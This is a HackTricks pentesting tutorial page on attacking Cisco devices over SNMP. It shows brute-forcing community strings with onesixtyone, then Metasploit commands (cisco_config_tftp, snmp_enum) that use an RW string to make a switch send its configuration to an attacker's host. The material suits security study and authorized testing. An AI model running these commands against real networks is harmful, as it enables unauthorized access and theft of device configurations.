# Cisco SNMP
โ˜๏ธ HackTricks Cloud โ˜๏ธ -๐Ÿฆ Twitter ๐Ÿฆ - ๐ŸŽ™๏ธ Twitch ๐ŸŽ™๏ธ - ๐ŸŽฅ Youtube ๐ŸŽฅ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**๐Ÿ’ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐Ÿฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
This page was copied from [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) ## Configuration exfiltration and enumeration via SNMP **SNMP (Simple Network Management Protocol)** is a protocol that allows you to monitor the status of devices on a computer network. It can be network equipment, IP phones, corporate servers or anything else. **SNMP uses the UDP transport layer protocol with port numbers 161/UDP and 162/UDP.** So-called community strings are used to refer SNMP agents to the server. These are, shall we say, special passwords for communicating with the SNMP server. **Community strings have either RO (read-only) or RW (read-write) permissions.** **Actually, SNMP can not only monitor the equipment status, but also manage it in full: dump configs, change the configuration, etc.** If a pentester can look up the value of community strings, he actually gains access to the equipment. **However, it all depends on which string he bruteforcedโ€” to RO or RW community string.** **Bruteforce community strings can be implemented using the** [**onesixtyone**](https://github.com/trailofbits/onesixtyone) **utility.** It will take as input the dictionary for bruteforcing and the IP addresses of the target hosts. The targets will be: * **10.10.100.10 โ€” Cisco vIOS Switch** * **10.10.100.254 โ€” Cisco vIOS Router** ``` ~$ onesixtyone -c communitystrings -i targets ``` We found out what community strings are used on those devices. This opens the way for us to exploititation. ### 8.1 cisco\_config\_tftp With the Metasploit framework, namely the **cisco\_config\_tftp** module, you can pull the device configuration by knowing the value of the community string. The string that has the rights to the RW is **private**. We will need the following: * **RW community string (COMMUNITY)** * **Attackerโ€™s IP address (LHOST)** * **Target equipment IP address (RHOSTS)** * **the path in which the module outputs the configuration of the device (OUTPUTDIR)** ```bash msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10 msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50 msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit ``` After starting the module, the host configuration with address 10.10.100.10 (10.10.100.10.txt) will be downloaded to the specified folder. ![](<../../.gitbook/assets/image (223).png>) ### 8.2 snmp\_enum With this module you can find out information about the target hardware. Everything is exactly the same: specify **COMMUNITY** (by the way, even a string with **RO permissions will do**) and the IP address of the target device. ```bash msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10 msf6 auxiliary(scanner/snmp/snmp_enum) > exploit ```
โ˜๏ธ HackTricks Cloud โ˜๏ธ -๐Ÿฆ Twitter ๐Ÿฆ - ๐ŸŽ™๏ธ Twitch ๐ŸŽ™๏ธ - ๐ŸŽฅ Youtube ๐ŸŽฅ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**๐Ÿ’ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐Ÿฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.